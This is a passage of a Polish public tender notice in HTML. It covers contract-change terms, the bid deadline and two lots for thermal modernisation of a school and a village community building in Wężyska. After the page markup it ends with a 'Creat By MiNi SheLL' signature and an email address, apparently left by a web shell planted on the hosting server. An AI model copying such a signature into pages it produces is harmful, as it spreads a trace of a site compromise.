przy zawieraniu umowy - termin zakończenia realizacji umowy możezostać przesunięty o czas niezbędny do uzyskania wyroku sądowego, lub innego orzeczenia sądu luborganu administracyjnego. 11. Jeżeli zmianie ulegną terminy realizacji zadania uwzględnione wUmowie o dofinansowanie (w tym wydłużenie terminu realizacji zadania z przyczyn obiektywnych,niezależnych od Wykonawcy) - termin zakończenia może zostać zmieniony o czas wynikający zuzyskanej przez Zamawiającego zgody na zmianę terminu (przyjmuje się domniemanie, że takieprzedłużenie służy poprawie jakości przedmiotu zamówienia, co jest korzystne i pożądane dlaZamawiającego), 12. Jeżeli Wykonawca złoży wniosek o zmianę terminu wykonania umowy, a zmianajest korzystna dla Zamawiającego - termin realizacji może zostać zmieniony w sposób uzgodnionypomiędzy stronami, 13. Jeżeli wystąpią znacząco odmienne od przyjętych warunki terenowe wszczególności podziemne sieci, instalacje, urządzenia lub niezinwentaryzowane obiekty budowlane,znaleziska archeologiczne itp., uniemożliwiające terminowe wykonanie przedmiotu umowy - terminrealizacji może zostać przesunięty o czas niezbędny do wykonania prac wynikających z nowychwarunków. 14. Jeżeli wprowadzono roboty zamienne i/lub zostanie wykryty błąd w SIWZ i zaistniejepotrzeba dokonania dodatkowych ustaleń, wykonania projektów zamiennych, uzyskania dodatkowychdecyzji administracyjnych to termin wykonania może zostać przesunięty o czas w jakim musiałonastąpić wstrzymane robót budowlanych lub wystąpiło zwolnienie ich tempa oraz o czas nawykonanie dodatkowych prac. 15. Zmiana przedmiotu jest dopuszczalna umowy w przypadku: 1)konieczności wykonania robót zamiennych, również istotnych z punktu widzenia Prawa Budowlanego,2) ograniczenia zakresu rzeczowego przedmiotu umowy (roboty zaniechane), 3) koniecznościwykonania robót dodatkowych, o których mowa w art. 144 ust. 1 pkt. 2) ustawy Pzp. 4) koniecznościwykonania robót, o których mowa w art. 144 ust. 1 pkt. 3) ustawy Pzp. 16. Zmiana wynagrodzenia jestdopuszczalna w przypadku: 1) ograniczenia zakresu rzeczowego (roboty zaniechane), o kwotywyliczone zgodnie z § 9 ust. 3 niniejszej Umowy, 2) realizacji dodatkowych robót budowlanych, októrych mowa w art. 144 ust. 1 pkt. 2) ustawy Pzp oraz robót o których mowa w art. 144 ust. 1 pkt. 3)ustawy PZP o kwoty wyliczone zgodnie z § 9 ust. 4 niniejszej Umowy, 3) zmiany ustawowejwysokości należnego podatku VAT, 4) zmiany zasad podlegania ubezpieczeniom społecznym lububezpieczeniu zdrowotnemu lub wysokości stawki na ubezpieczenia społeczne lub zdrowotne – jeżelite zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 17. Jeżeli zmianalub rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, nazasadach określonych w art. 26 ust. 2b Ustawy PZP w celu wykazania spełniania warunków udziału wpostępowaniu, Wykonawca jest zobowiązany wykazać Zamawiającemu, że proponowany innyPodwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany wtrakcie postępowania o udzielenie zamówienia. 18. Dopuszcza się wprowadzenie Podwykonawców doczęści zamówienia, dla których wcześniej nie przewidywano realizacji przez Podwykonawców. 19.Dopuszcza się wprowadzenie Podwykonawców do realizacji części zamówienia mimo, że w ofercieWykonawca nie przewidział realizacji jakichkolwiek części zamówienia przez Podwykonawców.Zmiany dotyczące Podwykonawców nie wymagają Aneksu do Umowy a jedynie Wniosku o zmianęPodwykonawcy wraz z dostarczeniem aktualnych dokumentów. Rejestru Podwykonawców, WzoruUmowy z Podwykonawcą do zatwierdzenia, chyba że zmiana Podwykonawcy wiąże się ze zmianą wskładzie Zespołu kadrowego, to sporządzenie Aneksu jest wymagane. 20. Zamawiający dopuszczawprowadzanie odpowiednich zmian wysokości wynagrodzenia należnego wykonawcy, w przypadkuzmiany stawki podatku od towarów i usług, wysokości minimalnego wynagrodzenia za pracę albowysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10października 2002 r. o minimalnym wynagrodzeniu za pracę, zasad podlegania ubezpieczeniomspołecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społecznelub zdrowotne lub zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, októrych mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych jeżelizmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę. W tym celuWykonawca przedstawi Zamawiającemu szczegółowe wyliczenie zmiany kosztów wraz zoświadczeniem o prawdziwości przedstawionych danych złożonym pod groźbą odpowiedzialnościkarnej. 21. Zamawiający dopuszcza możliwość wprowadzenia zmian wynikających ze skutkówepidemii COVID-19 lub innej epidemii znacznych rozmiarów mającej wpływ na sytuację Wykonawcy(zmiana zakresu zamówienia, waloryzacja umowy, zmiana terminów realizacji umowy wszczególnych przypadkach także możliwość odstąpienia od umowy bez konsekwencji, ), podwarunkiem, że Wykonawca lub Zamawiający wykaże, że skutki te nie były przewidziane przezWykonawcę lub Zamawiającego na etapie złożenia oferty i odpisania Umowy. 22. Dopuszcza się innezmiany umowy: 1) w przypadku, gdy konieczność zmiany Umowy wynikać będzie z umów,wytycznych, zaleceń, decyzji lub innych dokumentów, którymi stroną lub autorem będą instytucjefinansujące projekt; 2) w przypadku zmiany, rozwiązania, odstąpienia, wygaśnięcia lub stwierdzenianieważności umowy o dofinansowanie projektu; 3) podczas wykonywania przedmiotu Umowyzaistnieje konieczność dokonania uszczegółowienia, wykładni lub doprecyzowania poszczególnychzapisów Umowy, nie powodujących zmiany celu i istoty Umowy; 4) obiektywnie jest to niezbędne dlazachowania i realizacji celów Umowy, dla których została ona zawarta; 23. Warunkiem dokonaniazmian, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: opis propozycji zmiany,uzasadnienie zmiany, opis wpływu zmiany na terminy wykonania umowy, a w przypadku zmiandotyczących wynagrodzenia należne kwoty wraz z odpowiednim kosztorysem.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-06-19</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">07:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">oferty mogą być składane w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Część I – Termomodernizacja budynku Zespołu Szkół w Wężyskach</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotemzamówienia jest opracowanie dokumentacji projektowej oraz wykonanie termomodernizacji budynkuużyteczności publicznej Zespołu Szkół w Wężyskach, zgodnie z niniejszą specyfikacją (wraz ze wzoremumowy), Programem funkcjonalno-użytkowym. Wykonana termomodernizacja powinna spełnić conajmniej parametry ekologiczne określone w audycie energetycznym (w zakresie zmniejszenia poziomuemisji oraz efektywności energetycznej). Układ ruralistyczny wsi Wężyska podlega ochronie i opiece napodstawie ustawy o ochronie zabytków i opiece nad zabytkami. Na Wykonawcy spoczywa obowiązekwykonania: • dokumentacji projektowej obejmującej co najmniej: - projekty budowlane i wykonawcze wpodziale na branże wg wymagań prawnych w zakresie obszarów termomodernizowanych, - specyfikacjetechniczne wykonania i odbioru robót, - wykonanie dokumentacji powykonawczej wraz z obliczeniamiprzedstawiającymi osiągnięcie efektu ekologicznego oraz ekonomicznego wykonanej termomodernizacji,- wykonanie certyfikatu energetycznego dla obiektu, • harmonogramu rzeczowo-finansowego narealizację robót budowlanych określające grupy , • wykonania zadania termomodernizacji zgodnie zopracowanymi i zatwierdzonymi przez Zamawiającego projektami wykonawczymi, PFU, SIWZ orazaudytami, • wykonania audytu termomodernizacyjnego na podstawie sporządzonej dokumentacji przedprzystąpieniem do prac termomodernizacyjnych, • wykonania audytu termomodernizacyjnego powykonaniu prac termomodernizacyjnych, którego podstawę stanowią badania i pomiary dokonane wrzeczywistości na obiekcie termomodernizowanym. W zakresie jest również uzyskanie wszelkichpozwoleń oraz wykonanie robót budowlanych i dostaw na podstawie w/w opracowań w tym ew.pozwolenia na budowę. Przed przystąpieniem do prac termomodernizacyjnych Wykonawca jestzobowiązany uzyskać informację od Zamawiającego o zatwierdzeniu dokumentacji projektowej. Przedzgłoszeniem zakończenia robót Wykonawca przedstawi: • dokumentację powykonawczą wraz zobliczeniami przedstawiającymi osiągnięcie efektu ekologicznego oraz ekonomicznego, • certyfikatenergetyczny, • Audyt energetyczny powykonawczy oparty o dokumentację techniczną oraz pomiaryparametrów charakterystycznych wykonane w termomodernizowanym obiekcie. Dokumentacjaprojektowa musi być zatwierdzona przez Zamawiającego. Dokumentacja projektowa powinna byćopracowana w języku polskim, zgodnie z obowiązującymi przepisami budowlanymi i polskimi normami.Dokumentację należy dostarczyć Zamawiającemu w następującej ilości egzemplarzy tj.: • projektbudowlany – 6 egzemplarzy, • projekt wykonawczy – 6 egzemplarzy, • specyfikacja technicznawykonania i odbioru robót – 4 egzemplarze. Dokumentację wymienioną powyżej wraz z kopią pełnejdokumentacji formalno-prawnej (uzyskane uzgodnienia, opinie, warunki techniczne przyłączy itp.) należyprzekazać Zamawiającemu dodatkowo w wersji elektronicznej na CD, zapisaną w formacie PDF.Wykonawca winien przedstawić kolorystykę elewacji uwzględniająca minimum 6 kolorów, przy czymkolory ciemne jedynie dla uwydatnienia lub podkreślenia niewielkich elementów architektonicznychelewacji (do akceptacji Zamawiającego). Kolor tynku winien posiadać stopień odporności napromieniowanie słoneczne powyżej 25 %. Wykonawca powinien również uzyskać wszelkie niezbędnepozwolenia, certyfikaty itp., wynikające z wykonywanej dokumentacji oraz prowadzonych robót.Inwestycja zlokalizowana jest na terenie Szkoły Podstawowej im. św. Jadwigi Śląskiej w Wężyskach (wdokumentacji występuje poprzednia nazwa Zespół Szkół w Wężyskach)– Wężyska 162, gm KrosnoOdrzańskie. Dane ogólne budynku: • charakter budynku: Użyteczności publicznej • powierzchniazabudowy: 2668,7 m2, • powierzchnia użytkowa 3120,00 m2, • kubatura: 11432,10 m3, • ilośćkondygnacji: 3 • wysokość budynku: 12 m, • długość budynku: 85,00 m, • szerokość budynku: 60,00 m, •instalacje: budynek wyposażony jest w instalację elektryczną oraz wodno-kanalizacyjną • wentylacja:grawitacyjna • chłodzenie: brak. Termomodernizacja budynku obejmuje: • ocieplenie ścian zewnętrznychbudynku, • ocieplenie połaci dachowej od wewnątrz, • wymianę stolarki drzwiowej, • wymianę stolarkiokiennej, • wymianę parapetów zewnętrznych w celu niwelacji mostków termicznych przegródokiennych, • w celu zabezpieczenia wymaganego strumienia wymiany powietrza wykonanie wentylacjimechanicznej z rekuperacją zgodnie z obowiązującymi przepisami zgodnie z zapisami audytu, • wymianęźródła ciepła c.o. na gruntową pompę ciepła, • wymianę źródła CWU, • wymianę grzejników na nowe, •montaż izolacji przewodów instalacji c.o., • montaż automatyki do sterowania systemem c. o. zwykorzystaniem TIK, • wymianę źródeł światła na energooszczędne źródła światła LED, • zabezpieczenieenergii pierwotnej na potrzeby oświetlenia z odnawialnego źródła energii elektrycznej – instalacjifotowoltaicznej, • dostosowanie instalacji odgromowej do wymogów projektowanej instalacjifotowoltaicznej i obowiązujących przepisów i wymogów prawa, • prace wykończeniowe i uzupełniającetermomodernizację: o demontaż i ponowny montaż elementów zamontowanych na elewacji (kamery,oświetlenie itp.), o inne prace niezbędne do wykonania przy termomodernizacji (przebudowy kominów,wymiany obróbek blacharskich, pasy pod i nad rynnowe, itp.), o wymianę rynien i rur spustowych wraz zprzebudową odpływów w gruncie do najbliższych studzienek w celu zabezpieczenia obszarówtermomodernizowanych przed podciekaniem. Inwestycję należy przeprowadzić w warunkach obiektuczynnego (funkcjonująca szkoła i przedszkole w roku szkolnym – w czasie wakacji budyneknieużytkowany) i należy zabezpieczyć budowę w celu możliwości bezpiecznego korzystania z obiektu.Parametry techniczne opisanych prac zawarte są w audycie termomodernizacyjnym będącymzałącznikiem do niniejszej dokumentacji oraz PFU.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, 71220000-6, 71240000-2, 45300000-0, 45400000-1, 09300000-2, 45210000-2, 45320000-6, 45420000-7, 45450000-6, 09331200-0, 45261215-4, 45261900-3, 45311000-0, 45315300-1, 45315600-4, 45315700-5, 45321000-3, 45421100-5, 45450000-6, 45453000-7, 71232310-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji jakosci</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Część II – Termomodernizacja budynku o wielu funkcjach użytkowych w Wężyskach – świetlica</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotemzamówienia jest opracowanie dokumentacji projektowej oraz wykonanie termomodernizacji budynkuużyteczności publicznej w Wężyskach 54, gmina Krosno Odrzańskie zgodnie z niniejszą specyfikacją(wraz ze wzorem umowy), Programem funkcjonalno-użytkowym. Wykonana termomodernizacjapowinna spełnić co najmniej parametry ekologiczne określone w audycie energetycznym (w zakresiezmniejszenia poziomu emisji oraz efektywności energetycznej). Budynek figuruje w gminnej ewidencjizabytków, a układ ruralistyczny wsi Wężyska podlega ochronie i opiece na podstawie ustawy o ochroniezabytków i opiece nad zabytkami. Na Wykonawcy spoczywa obowiązek wykonania: • dokumentacjiprojektowej obejmującej co najmniej: - projekty budowlane i wykonawcze w podziale na branże wgwymagań prawnych w zakresie obszarów termomodernizowanych, - specyfikacje techniczne wykonania iodbioru robót, - wykonanie dokumentacji powykonawczej wraz z obliczeniami przedstawiającymiosiągnięcie efektu ekologicznego oraz ekonomicznego wykonanej termomodernizacji, - wykonaniecertyfikatu energetycznego dla obiektu, • harmonogramu rzeczowo-finansowego na realizację robótbudowlanych, • wykonania zadania termomodernizacji zgodnie z opracowanymi i zatwierdzonymi przezZamawiającego projektami wykonawczymi, PFU, SIWZ oraz audytami, • wykonania audytutermomodernizacyjnego na podstawie sporządzonej dokumentacji przed przystąpieniem do practermomodernizacyjnych, • wykonania audytu termomodernizacyjnego po wykonaniu practermomodernizacyjnych, którego podstawę stanowią badania i pomiary dokonane w rzeczywistości naobiekcie termomodernizowanym, • uzyskanie zgód formalnych na użytkowanie obiektu po wykonaniuprac objętych niniejszym zamówieniem (Wykonawca we własnym zakresie ustali i wyceni wymagania ikoszty ewentualnych usprawnień wymaganych do odbioru inwestycji przez odpowiednie organy).Wykonawca winien przedstawić kolorystykę elewacji uwzględniająca minimum 6 kolorów, przy czymkolory ciemne jedynie dla uwydatnienia lub podkreślenia niewielkich elementów architektonicznychelewacji. Kolor tynku winien posiadać stopień odporności na promieniowanie słoneczne powyżej 25 %.Wykonawca powinien również uzyskać wszelkie niezbędne pozwolenia, certyfikaty itp., wynikające zwykonywanej dokumentacji oraz prowadzonych robót. Dane ogólne budynku: • charakter budynku:Użyteczności publicznej • powierzchnia zabudowy: : 450,84 m2, • kubatura: : 6 427,00 m3, • ilośćkondygnacji: 3 + piwnica, • instalacje: budynek wyposażony jest w instalację elektryczną oraz wodnokanalizacyjną,CO oraz CWU, • wentylacja: grawitacyjna, • chłodzenie: brak. Termomodernizacjabudynku obejmuje: • ocieplenie ścian zewnętrznych budynku, • docieplenie stropu wewnętrznego nadpiwnicą, stopu wewnętrznego pod poddaszem oraz stropu zewnętrznego nad przejazdem, • wymianęstolarki drzwiowej, • wymianę stolarki okiennej, • wymianę parapetów zewnętrznych w celu niwelacjimostków termicznych przegród okiennych, • w celu zabezpieczenia wymaganego strumienia wymianypowietrza wykonanie wentylacji mechanicznej z rekuperacją zgodnie z obowiązującymi przepisamizgodnie z zapisami audytu, • wymianę źródła ciepła c.o. na gruntową pompę ciepła, • wymianę źródłaCWU, • wymianę grzejników na nowe, • montaż izolacji przewodów instalacji c.o., • montaż automatykido sterowania systemem c.o. z wykorzystaniem TIK. • wymianę źródeł światła na energooszczędneźródła światła LED, • zabezpieczenie energii pierwotnej na potrzeby CO i CWU z odnawialnego źródłaenergii elektrycznej – instalacji fotowoltaicznej, • dostosowanie instalacji odgromowej do wymogówprojektowanej instalacji fotowoltaicznej i obowiązujących przepisów i wymogów prawa, • pracewykończeniowe i uzupełniające termomodernizację: o demontaż i ponowny montaż elementówzamontowanych na elewacji (kamery, oświetlenie itp.), o inne prace niezbędne do wykonania przytermomodernizacji (przebudowy kominów, wymiany obróbek blacharskich, pasy pod i nad rynnowe, itp.),o wymianę rynien i rur spustowych wraz z przebudową odpływów w gruncie do najbliższych studzienekw celu zabezpieczenia obszarów termomodernizowanych przed podciekaniem. W uzupełniniu informacjiz PFU Zamawiający informuje, że konieczna jest wymiana instalacji ciepłej wody na potrzeby CO iCWU, a także instalacja elektryczna – w pełnym zakresie, co należy przyjąć przy wycenie prac.Parametry techniczne opisanych prac zawarte są w audycie termomodernizacyjnym będącymzałącznikiem do niniejszej dokumentacji oraz PFU. Inwestycję należy przeprowadzić w warunkachobiektu czynnego (mieszkania socjalne, w których przebywają lokatorzy oraz czynny sklep),należyzabezpieczyć budowę w celu możliwości bezpiecznego korzystania z obiektu. Nie przewiduje siękorzystania ze świetlicy wiejskiej w okresie realizacji inwestycji. ROBOTY NIEUJĘTE W PFU ani wAUDYCIE ENERGETYCZNYM W ramach zadania należy także zaprojektować i wykonać zakreswymiany pokrycia dachowego wraz ze wzmocnieniem w zakresie opisanym poniżej: 1. Rozebraniepokrycia dachowego z dachówki karpiówki, 2. Impregnacja istniejącej więźby dachowej, 3. Wzmocnienieelementów konstrukcyjnych więźby dachowej, dostosowującego ciężar do pokrycia dachowego doprojektowanego pokrycia oraz montażu fotowoltaiki, 4. Nadbicie łat i kontrłat, 5. Wykonanie pokryciadachowego z lekkiej blachy (blacha lub inny materiał zaakceptowany przez LWKZ) – dla celówkalkulacji wstępnej należy podać wycenę z zastosowaniem pokrycia dachowego z blachodachówkiocynkowanej (wzór: karpiówka) o grubości nie mniejszej niż 0,5 cm – w przypadku braku akceptacjimateriału ze strony LWKZ przewiduje się zmianę materiałową (w tym celu Wykonawca przedstawikosztorys różnicowy podlegający akceptacji przez Zamawiającego – podstawa sporządzenia aneksu), 6.Wykonanie orynnowania i obróbek blacharskich, 7. Wymiana zdegradowanego stropu nad świetlicą, 8.Wymiana instalacji kanalizacyjnej w obiekcie, 9. Modernizacja wentylacji w kuchni obiektuświetlicowego. Należy w taki sposób zaplanować prace żeby możliwe było zapewnienie ciągłościogrzewania (w okresie od 1 października do 30 kwietnia) Prace nie ujęte w zaleceniach audytuenergetycznego oraz PFU należy zaprojektować i wykonać w taki sposób żeby uzyskać parametryekologiczne nie gorsze niż określone w audycie energetycznym (w zakresie zmniejszenia poziomu emisjioraz efektywności energetycznej). Uwaga: W związku z faktem uzupełnienia niektórych elementów wpowyższym opisie przedmiotu zamówienia niektóre czynności wskazane w PFU nie będą musiały byćwykonywane (np. płukanie instalacji wodnej), co wynika z natury zamierzenia inwestycyjnego, a wzwiązku z tym nie należy wyceniać tych czynności w kalkulacji oferty.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, 71220000-6, 71240000-2, 45300000-0, 45400000-1, 09300000-2, 45210000-2, 45260000-7, 45310000-3, 45320000-6, 45420000-7, 45450000-6, 09331200-0, 45231000-5, 45261215-4, 45261900-3, 45311000-0, 45315300-1, 45315600-4, 45315700-5, 45321000-3, 45421100-5, 45450000-6, 45453000-7, 71232310-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji jakosci</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com